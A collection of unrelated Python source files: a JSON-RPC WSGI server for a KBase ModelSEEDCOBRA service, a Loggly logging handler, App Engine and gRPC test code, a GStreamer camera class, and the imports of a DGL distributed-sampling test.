self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'ModelSEEDCOBRA'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_ModelSEEDCOBRA.run_phase_plain_analysis,
name='ModelSEEDCOBRA.run_phase_plain_analysis',
types=[dict])
self.method_authentication['ModelSEEDCOBRA.run_phase_plain_analysis'] = 'required' # noqa
self.rpc_service.add(impl_ModelSEEDCOBRA.status,
name='ModelSEEDCOBRA.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'ModelSEEDCOBRA ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
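
# A minimal sketch of driving the helpers above from a test: start the WSGI
# server in a child process on an OS-assigned port, then shut it down. The
# function is illustrative only and is not called by this module.
def _example_start_and_stop():
    port = start_server(host='localhost', port=0, newprocess=True)
    print("server listening on port %s" % port)
    stop_server()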
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
loggly_handler.py
|
from __future__ import absolute_import
import atexit
import json
import os
import threading
from functools import partial
import sys
import requests
from restapi_logging_handler.restapi_logging_handler import (
RestApiHandler,
serialize,
)
def setInterval(interval):
def decorator(function):
def wrapper(*args, **kwargs):
stopped = threading.Event()
def loop(): # executed in another thread
while not stopped.wait(interval): # until stopped
function(*args, **kwargs)
t = threading.Thread(target=loop)
t.daemon = True # stop if the program exits
t.start()
return stopped
return wrapper
return decorator
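
# A minimal sketch of how the setInterval decorator above is used: the first
# call to the decorated function starts a daemon thread that re-runs it every
# `interval` seconds and returns a threading.Event; setting that event stops
# the loop. The heartbeat function and 5-second interval are illustrative.
def _example_set_interval_usage():
    @setInterval(5)
    def heartbeat():
        print('still alive')

    stopper = heartbeat()  # starts the background loop, returns the Event
    # ... later, stop the periodic calls:
    stopper.set()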
class LogglyHandler(RestApiHandler):
"""
A handler which pipes all logs to loggly through HTTP POST requests.
Some ideas borrowed from github.com/kennedyj/loggly-handler
"""
def __init__(self,
custom_token=None,
app_tags=None,
max_attempts=5,
aws_tag=False):
"""
        custom_token: The loggly custom token account ID
        app_tags: Loggly tags. Can be a tag string or a list of tag strings
aws_tag: include aws instance id in tags if True and id can be found
"""
self.pid = os.getpid()
self.tags = self._getTags(app_tags)
self.custom_token = custom_token
self.aws_tag = aws_tag
if self.aws_tag:
id_url = None
try:
aws_base = "http://169.254.169.254/latest/meta-data/{}"
id_url = aws_base.format('instance-id')
self.ec2_id = requests.get(id_url, timeout=2).content.decode(
'utf-8')
except Exception as e:
sys.stderr.write(
'Could not obtain metadata from url {} error {}'.format(
id_url, repr(e)
))
self.ec2_id = 'id_NA'
self.tags.append(self.ec2_id)
super(LogglyHandler, self).__init__(self._getEndpoint())
self.max_attempts = max_attempts
self.timer = None
self.logs = []
self.timer = self._flushAndRepeatTimer()
atexit.register(self._stopFlushTimer)
@setInterval(1)
def _flushAndRepeatTimer(self):
self.flush()
def _stopFlushTimer(self):
self.timer.set()
self.flush()
    def _getTags(self, app_tags):
        if isinstance(app_tags, str):
            tags = app_tags.split(',')
        elif app_tags:
            # copy so the caller's list is not mutated by the insert below
            tags = list(app_tags)
        else:
            # default for the app_tags=None case instead of failing on the
            # membership test below
            tags = []
        if 'bulk' not in tags:
            tags.insert(0, 'bulk')
        return tags
def _implodeTags(self, add_tags=None):
if add_tags:
tags = self.tags.copy()
tags.extend(add_tags)
else:
tags = self.tags
return ",".join(tags)
def _getEndpoint(self, add_tags=None):
"""
Override Build Loggly's RESTful API endpoint
"""
return 'https://logs-01.loggly.com/bulk/{0}/tag/{1}/'.format(
self.custom_token,
self._implodeTags(add_tags=add_tags)
)
def _prepPayload(self, record):
"""
record: generated from logger module
This preps the payload to be formatted in whatever content-type is
expected from the RESTful API.
"""
# return json.dumps(self._getPayload(record), default=serialize)
return self._getPayload(record)
def _getPayload(self, record):
"""
The data that will be sent to loggly.
"""
payload = super(LogglyHandler, self)._getPayload(record)
payload['tags'] = self._implodeTags()
return payload
    def handle_response(self, sess, resp, batch=None, attempt=0):
if resp.status_code != 200:
if attempt <= self.max_attempts:
attempt += 1
self.flush(batch, attempt)
else:
sys.stderr.write(
'LogglyHandler: max post attempts '
'failed status {} content {}'.format(
resp.status_code, resp.content.decode()
))
def flush(self, current_batch=None, attempt=1):
if current_batch is None:
self.logs, current_batch = [], self.logs
if current_batch:
# group by process id and thread id, for tags
pids = {}
for d in current_batch:
pid = d.pop('pid', 'nopid')
tid = d.pop('tid', 'notid')
data = json.dumps(d, default=serialize)
if pid in pids:
p = pids[pid]
if tid in p:
p[tid].append(data)
else:
p[tid] = [data]
else:
pids[pid] = {tid: [data]}
for pid, tids in pids.items():
for tid, data in tids.items():
callback = partial(
self.handle_response, batch=data, attempt=attempt)
url = self._getEndpoint(add_tags=[pid, tid])
payload = '\n'.join(data)
self.session.post(
url,
data=payload,
headers={'content-type': 'application/json'},
background_callback=callback
)
def emit(self, record):
"""
Override emit() method in handler parent for sending log to RESTful
API
"""
pid = os.getpid()
if pid != self.pid:
self.pid = pid
self.logs = []
self.timer = self._flushAndRepeatTimer()
atexit.register(self._stopFlushTimer)
# avoid infinite recursion
if record.name.startswith('requests'):
return
self.logs.append(self._prepPayload(record))
|
server_tests.py
|
#!/usr/bin/python2.7
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starts up an appserver and runs end-to-end tests against it.
Instead of running this script directly, use the 'server_tests' shell script,
which sets up the PYTHONPATH and other necessary environment variables.
The actual test cases reside in server_test_cases.py.
Use -k to select particular test classes or methods by a substring match:
tools/server_tests -k ConfigTests
tools/server_tests -k test_delete_and_restore
Specify -v to show the name of each test as it runs (rather than just dots).
Specify -s to see the messages printed by all tests as they run (by default,
stdout/stderr will be captured and then shown only for failing tests).
"""
import os
import pytest
import re
import signal
import smtpd
import subprocess
import sys
import tempfile
import threading
import time
from model import *
import remote_api
import setup_pf as setup
class ProcessRunner(threading.Thread):
"""A thread that starts a subprocess, collects its output, and stops it."""
READY_RE = re.compile('') # this output means the process is ready
ERROR_RE = re.compile('ERROR|CRITICAL') # output indicating failure
OMIT_RE = re.compile('INFO |WARNING ') # don't bother showing these lines
debug = False # set to True to see all log messages, ignoring OMIT_RE
def __init__(self, name, args):
threading.Thread.__init__(self)
self.name = name
self.args = args
self.process = None # subprocess.Popen instance
self.ready = False # process is running and ready
self.failed = False # process emitted an error message in its output
self.output = []
def run(self):
"""Starts the subprocess and collects its output while it runs."""
self.process = subprocess.Popen(
self.args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
close_fds=True)
# Each subprocess needs a thread to be watching it and absorbing its
# output; otherwise it will block when its stdout pipe buffer fills.
self.start_watching_output(self.process.stdout)
self.start_watching_output(self.process.stderr)
self.process.wait()
def start_watching_output(self, output):
stdout_thread = threading.Thread(target=self.watch_output, args=(output,))
stdout_thread.setDaemon(True)
stdout_thread.start()
def watch_output(self, output):
while self.process.poll() is None:
line = output.readline()
if not line: # process finished
return
if self.READY_RE.search(line):
self.ready = True
if not self.debug and self.OMIT_RE.search(line): # omit these lines
continue
if self.ERROR_RE.search(line): # something went wrong
self.failed = True
if line.strip():
self.output.append(line.strip('\n'))
def stop(self):
"""Terminates the subprocess and returns its status code."""
if self.process: # started
if self.isAlive(): # still running
os.kill(self.process.pid, signal.SIGINT)
else:
self.failed = self.process.returncode != 0
self.clean_up()
if self.failed:
self.flush_output()
print >>sys.stderr, '%s failed (status %s).\n' % (
self.name, self.process.returncode)
else:
print >>sys.stderr, '%s stopped.' % self.name
def flush_output(self):
"""Flushes the buffered output from this subprocess to stderr."""
self.output, lines_to_print = [], self.output
if lines_to_print:
sys.stderr.write('\n--- output from %s ---\n' % self.name)
sys.stderr.write('\n'.join(lines_to_print) + '\n\n')
def wait_until_ready(self, timeout=10):
"""Waits until the subprocess has logged that it is ready."""
fail_time = time.time() + timeout
while self.isAlive() and not self.ready and time.time() < fail_time:
for jiffy in range(10): # wait one second, aborting early if ready
if not self.ready:
time.sleep(0.1)
if not self.ready:
self.flush_output() # after each second, show output
if self.ready:
print >>sys.stderr, '%s started.' % self.name
else:
raise RuntimeError('%s failed to start.' % self.name)
def clean_up(self):
pass
class AppServerRunner(ProcessRunner):
"""Manages a dev_appserver subprocess."""
READY_RE = re.compile('Starting module "default" running at|Running application')
OMIT_RE = re.compile(
'INFO |WARNING |DeprecationWarning: get_request_cpu_usage')
def __init__(self, port, smtp_port):
self.__datastore_file = tempfile.NamedTemporaryFile()
ProcessRunner.__init__(self, 'appserver', [
os.environ['PYTHON'],
os.path.join(os.environ['APPENGINE_DIR'], 'dev_appserver.py'),
os.environ['APP_DIR'],
'--port=%s' % port,
'--datastore_path=%s' % self.__datastore_file.name,
'--require_indexes',
'--smtp_host=localhost',
'--smtp_port=%d' % smtp_port,
                # By default, if we perform a datastore write and then a query,
                # the query may not see the data until the write is fully
                # applied. That matches production behavior, but it is
                # inconvenient for server tests, because we often perform a
                # datastore write and then check that it is visible in a web
                # page. This flag makes sure that queries see the data as soon
                # as the write is applied.
'--datastore_consistency_policy=consistent',
])
class MailThread(threading.Thread):
"""Runs an SMTP server and stores the incoming messages."""
messages = []
def __init__(self, port):
threading.Thread.__init__(self)
self.port = port
self.stop_requested = False
def run(self):
class MailServer(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
print >>sys.stderr, 'mail from:', mailfrom, 'to:', rcpttos
MailThread.messages.append(
{'from': mailfrom, 'to': rcpttos, 'data': data})
try:
server = MailServer(('localhost', self.port), None)
except Exception, e:
print >>sys.stderr, 'SMTP server failed: %s' % e
sys.exit(-1)
print >>sys.stderr, 'SMTP server started.'
while not self.stop_requested:
smtpd.asyncore.loop(timeout=0.5, count=1)
print >>sys.stderr, 'SMTP server stopped.'
def stop(self):
self.stop_requested = True
def wait_until_ready(self, timeout=10):
pass
def flush_output(self):
pass
class PyTestPlugin:
"""A plugin for pytest that does the setup and teardown for server tests."""
def __init__(self):
self.threads = []
def pytest_addoption(self, parser):
group = parser.getgroup(
'server_tests', 'App Engine server testing', after='general')
group.addoption('--server',
help='appserver URL (default: localhost:8081)')
group.addoption('--port', type='int', default=8081,
help='appserver port number (default: 8081)')
group.addoption('--mailport', type='int', default=8025,
help='SMTP server port number (default: 8025)')
def pytest_configure(self, config):
options = config.option
url = options.server or 'localhost:%d' % options.port
secure, host, port, path = remote_api.parse_url(url)
if host == 'localhost':
# We need to start up a clean new appserver for testing.
self.threads.append(AppServerRunner(options.port, options.mailport))
self.threads.append(MailThread(options.mailport))
for thread in self.threads:
thread.start()
for thread in self.threads:
thread.wait_until_ready()
# Connect to the datastore.
url, app_id = remote_api.connect(url, 'test@example.com', 'test')
# Reset the datastore for the first test.
reset_data()
# Give the tests access to configuration information.
config.hostport = '%s:%d' % (host, port)
config.mail_server = MailThread
def pytest_unconfigure(self, config):
for thread in self.threads:
if hasattr(thread, 'flush_output'):
thread.flush_output()
for thread in self.threads:
thread.stop()
thread.join()
def pytest_runtest_setup(self):
MailThread.messages = []
def reset_data():
"""Reset the datastore to a known state, populated with test data."""
setup.reset_datastore()
db.put([
Authorization.create(
'haiti', 'test_key', domain_write_permission='test.google.com'),
Authorization.create(
'haiti', 'domain_test_key',
domain_write_permission='mytestdomain.com'),
Authorization.create(
'haiti', 'reviewed_test_key',
domain_write_permission='test.google.com',
mark_notes_reviewed=True),
Authorization.create(
'haiti', 'not_allow_believed_dead_test_key',
domain_write_permission='test.google.com',
believed_dead_permission=False),
Authorization.create(
'haiti', 'allow_believed_dead_test_key',
domain_write_permission='test.google.com',
believed_dead_permission=True),
Authorization.create(
'haiti', 'other_key', domain_write_permission='other.google.com'),
Authorization.create(
'haiti', 'read_key', read_permission=True),
Authorization.create(
'haiti', 'full_read_key', full_read_permission=True),
Authorization.create(
'haiti', 'search_key', search_permission=True),
Authorization.create(
'haiti', 'subscribe_key', subscribe_permission=True),
Authorization.create(
'*', 'global_test_key',
domain_write_permission='globaltestdomain.com'),
Authorization.create(
'*', 'global_search_key', search_permission=True),
])
def monkeypatch_pytest_terminal_reporter():
"""Improves the output produced by _pytest.terminal.TerminalReporter."""
import _pytest.terminal
def write_sep(self, sep, title=None, **markup):
if sep == '_':
markup['cyan'] = 1 # highlight the failed test name in cyan
self._tw.line() # put a blank line before the failure report
self._tw.sep(sep, title, **markup)
_pytest.terminal.TerminalReporter.write_sep = write_sep
if __name__ == '__main__':
monkeypatch_pytest_terminal_reporter()
# Run the tests, using sys.exit to set exit status (nonzero for failure).
sys.exit(pytest.main(plugins=[PyTestPlugin()]))
|
_channel_close_test.py
|
# Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests server and client side compression."""
import itertools
import logging
import threading
import time
import unittest
import grpc
from tests.unit import test_common
from tests.unit.framework.common import test_constants
_BEAT = 0.5
_SOME_TIME = 5
_MORE_TIME = 10
_STREAM_URI = 'Meffod'
_UNARY_URI = 'MeffodMan'
class _StreamingMethodHandler(grpc.RpcMethodHandler):
request_streaming = True
response_streaming = True
request_deserializer = None
response_serializer = None
def stream_stream(self, request_iterator, servicer_context):
for request in request_iterator:
yield request * 2
class _UnaryMethodHandler(grpc.RpcMethodHandler):
request_streaming = False
response_streaming = False
request_deserializer = None
response_serializer = None
def unary_unary(self, request, servicer_context):
return request * 2
_STREAMING_METHOD_HANDLER = _StreamingMethodHandler()
_UNARY_METHOD_HANDLER = _UnaryMethodHandler()
class _GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == _STREAM_URI:
return _STREAMING_METHOD_HANDLER
else:
return _UNARY_METHOD_HANDLER
_GENERIC_HANDLER = _GenericHandler()
class _Pipe(object):
def __init__(self, values):
self._condition = threading.Condition()
self._values = list(values)
self._open = True
def __iter__(self):
return self
def _next(self):
with self._condition:
while not self._values and self._open:
self._condition.wait()
if self._values:
return self._values.pop(0)
else:
raise StopIteration()
def next(self):
return self._next()
def __next__(self):
return self._next()
def add(self, value):
with self._condition:
self._values.append(value)
self._condition.notify()
def close(self):
with self._condition:
self._open = False
self._condition.notify()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
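# Editor's sketch (not part of the original test, never invoked by the test
# runner): a minimal illustration of the blocking-iterator behaviour of _Pipe
# that the ChannelCloseTest cases below rely on.
def _pipe_usage_sketch():
    pipe = _Pipe((b'first',))
    assert next(pipe) == b'first'   # pre-seeded values are yielded immediately
    pipe.add(b'second')             # add() unblocks a consumer waiting in _next()
    assert next(pipe) == b'second'
    pipe.close()                    # once closed and drained, next() raises StopIteration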
class ChannelCloseTest(unittest.TestCase):
def setUp(self):
self._server = test_common.test_server(
max_workers=test_constants.THREAD_CONCURRENCY)
self._server.add_generic_rpc_handlers((_GENERIC_HANDLER,))
self._port = self._server.add_insecure_port('[::]:0')
self._server.start()
def tearDown(self):
self._server.stop(None)
def test_close_immediately_after_call_invocation(self):
channel = grpc.insecure_channel('localhost:{}'.format(self._port))
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterator = _Pipe(())
response_iterator = multi_callable(request_iterator)
channel.close()
request_iterator.close()
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_close_while_call_active(self):
channel = grpc.insecure_channel('localhost:{}'.format(self._port))
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterator = _Pipe((b'abc',))
response_iterator = multi_callable(request_iterator)
next(response_iterator)
channel.close()
request_iterator.close()
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_context_manager_close_while_call_active(self):
with grpc.insecure_channel('localhost:{}'.format(
self._port)) as channel: # pylint: disable=bad-continuation
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterator = _Pipe((b'abc',))
response_iterator = multi_callable(request_iterator)
next(response_iterator)
request_iterator.close()
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_context_manager_close_while_many_calls_active(self):
with grpc.insecure_channel('localhost:{}'.format(
self._port)) as channel: # pylint: disable=bad-continuation
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterators = tuple(
_Pipe((b'abc',))
for _ in range(test_constants.THREAD_CONCURRENCY))
response_iterators = []
for request_iterator in request_iterators:
response_iterator = multi_callable(request_iterator)
next(response_iterator)
response_iterators.append(response_iterator)
for request_iterator in request_iterators:
request_iterator.close()
for response_iterator in response_iterators:
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_many_concurrent_closes(self):
channel = grpc.insecure_channel('localhost:{}'.format(self._port))
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterator = _Pipe((b'abc',))
response_iterator = multi_callable(request_iterator)
next(response_iterator)
start = time.time()
end = start + _MORE_TIME
def sleep_some_time_then_close():
time.sleep(_SOME_TIME)
channel.close()
for _ in range(test_constants.THREAD_CONCURRENCY):
close_thread = threading.Thread(target=sleep_some_time_then_close)
close_thread.start()
while True:
request_iterator.add(b'def')
time.sleep(_BEAT)
if end < time.time():
break
request_iterator.close()
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_exception_in_callback(self):
with grpc.insecure_channel('localhost:{}'.format(
self._port)) as channel:
stream_multi_callable = channel.stream_stream(_STREAM_URI)
endless_iterator = itertools.repeat(b'abc')
stream_response_iterator = stream_multi_callable(endless_iterator)
future = channel.unary_unary(_UNARY_URI).future(b'abc')
def on_done_callback(future):
raise Exception("This should not cause a deadlock.")
future.add_done_callback(on_done_callback)
future.result()
if __name__ == '__main__':
logging.basicConfig()
unittest.main(verbosity=2)
|
camera.py
|
import cv2
import atexit
import traitlets
import threading
import numpy as np
class GStreamerCamera(traitlets.HasTraits):
value = traitlets.Any()
width = traitlets.Integer(default_value=320)
height = traitlets.Integer(default_value=180)
running = traitlets.Bool(default_value=False)
src = traitlets.Integer(default_value=0)
rate = traitlets.Integer(default_value=30)
native_width = traitlets.Integer(default_value=1280)
native_height = traitlets.Integer(default_value=720)
@staticmethod
def encode_image(image):
return bytes(cv2.imencode('.jpg', image)[1])
def __init__(self, *args, **kwargs):
super(GStreamerCamera, self).__init__(*args, **kwargs)
self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)
self._running = False
try:
self.cap = cv2.VideoCapture(self._gst_str(), cv2.CAP_GSTREAMER)
re, image = self.cap.read()
if not re:
raise RuntimeError('Could not read image from camera.')
        except Exception as exc:
            raise RuntimeError(
                'Could not initialize camera. Please see error trace.') from exc
atexit.register(self.cap.release)
def _gst_str(self):
return 'nvarguscamerasrc sensor-id=%d ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink' % (
self.src, self.native_width, self.native_height, self.rate, self.width, self.height)
def _read(self):
re, image = self.cap.read()
if re:
return image
else:
raise RuntimeError('Could not read image from camera')
def read(self):
if self._running:
raise RuntimeError('Cannot read directly while camera is running')
self.value = self._read()
return self.value
def _capture_frames(self):
while True:
if not self._running:
break
self.value = self._read()
@traitlets.observe('running')
def _on_running(self, change):
if change['new'] and not change['old']:
# transition from not running -> running
self._running = True
self.thread = threading.Thread(target=self._capture_frames)
self.thread.start()
elif change['old'] and not change['new']:
# transition from running -> not running
self._running = False
self.thread.join()
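# Editor's sketch (not part of the original file): one way this class might be
# exercised on a Jetson-style board whose GStreamer build provides
# nvarguscamerasrc. The observer name `on_new_frame` is illustrative only.
if __name__ == '__main__':
    import time
    camera = GStreamerCamera(width=320, height=180)
    def on_new_frame(change):
        # Each frame arrives as an HxWx3 BGR numpy array via the traitlets observer.
        print('frame shape:', change['new'].shape)
    camera.observe(on_new_frame, names='value')
    camera.running = True   # spawns the background capture thread
    time.sleep(2)
    camera.running = False  # joins the capture thread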
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.distributed import sample_neighbors
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
